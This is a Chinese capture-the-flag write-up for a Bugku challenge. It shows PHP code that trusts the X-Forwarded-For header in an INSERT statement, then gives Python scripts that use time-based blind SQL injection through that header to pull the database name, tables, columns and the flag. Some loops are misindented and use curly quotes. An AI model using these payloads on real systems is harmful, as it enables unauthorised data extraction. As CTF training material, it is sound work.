Bugku-INSERT INTO注入

题目:

flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

相关函数:

$_SERVER['HTTP_X_FORWARDED_FOR'] XFF头

$_SERVER['REMOTE_ADDR'] 用户正在查看当前页面的IP地址

explode(separator,string,limit)
separator    必需。规定在哪里分割字符串。
string        必需。要分割的字符串。

题目没有报错,可以通过时间盲注来做,而且需要注意:

1.$ip_arr = explode(',', $ip);
  这句话意思就是构造的注入语句不能有逗号',',不然只会查询第一个逗号前的值
2.sql="insert into client_ip (ip) values ('$ip')";
  构造的XFF头不能为 1')and sleep(5)# 这种格式,而是应该为
  1' and sleep(5))# 这种格式

脚本:

import requests

url = 'http://123.206.87.240:8002/web15/'

for i in range(30):
    headers = {'X-Forwarded-For':"1'and case when length(database())=%d then sleep(5) else 0 end)#"%i}
    try:
        req = requests.post(url,headers=headers,timeout=4)
    except Exception as e:
        print(i)
        print('gg')
        break
print('over')

name = ''
for position in range(1,6):
    for num in range(0,128):
        headers = {'X-Forwarded-For':"1'and case when ascii(substr((database()) from %d))=%d then sleep(5) else 0 end)#"%(position,num)}
        try:
            req = requests.post(url,headers=headers,timeout=4)
        except Exception as e:
            name += chr(num)
            print(chr(num),end='')
            break
print()
print(name)
print('over')


for i in range(100):
headers = {‘X-Forwarded-For’:”1’and case when length((select group_concat(table_name) from information_schema.tables where table_schema=(select database())))=%d then sleep(5) else 0 end)#”%i}
try:
req = requests.post(url,headers=headers,timeout=4)
except Exception as e:
print(i)
print(‘gg’)
break
print(‘over’)

name = ''
for position in range(1,15):
    for num in range(0,128):
        headers = {'X-Forwarded-For':"1'and case when ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=(select database()))from %d))=%d then sleep(5) else 0 end)#"%(position,num)}
        try:
            req = requests.post(url,headers=headers,timeout=4)
        except Exception as e:
            name += chr(num)
            print(chr(num),end='')
            break
print()
print(name)
print('over')


for i in range(100):
headers = {‘X-Forwarded-For’:”1’and case when length((select group_concat(column_name) from information_schema.columns where table_name=’flag’))=%d then sleep(5) else 0 end)#”%i}
try:
req = requests.post(url,headers=headers,timeout=4)
except Exception as e:
print(i)
print(‘gg’)
break
print(‘over’)

name = ''
for position in range(1,5):
    for num in range(0,128):
        headers = {'X-Forwarded-For':"1'and case when ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='flag') from %d))=%d then sleep(5) else 0 end)#"%(position,num)}
        try:
            req = requests.post(url,headers=headers,timeout=4)
        except Exception as e:
            name += chr(num)
            print(chr(num),end='')
            break
print()
print(name)
print('over')

name = ''
for position in range(1,100):
    for num in range(0,128):
        headers = {'X-Forwarded-For':"1'and case when ascii(substr((select flag from flag) from %d))=%d then sleep(5) else 0 end)#"%(position,num)}
        try:
            req = requests.post(url,headers=headers,timeout=4)
        except Exception as e:
            name += chr(num)
            print(chr(num),end='')
            break
print()
print(name)
print('over')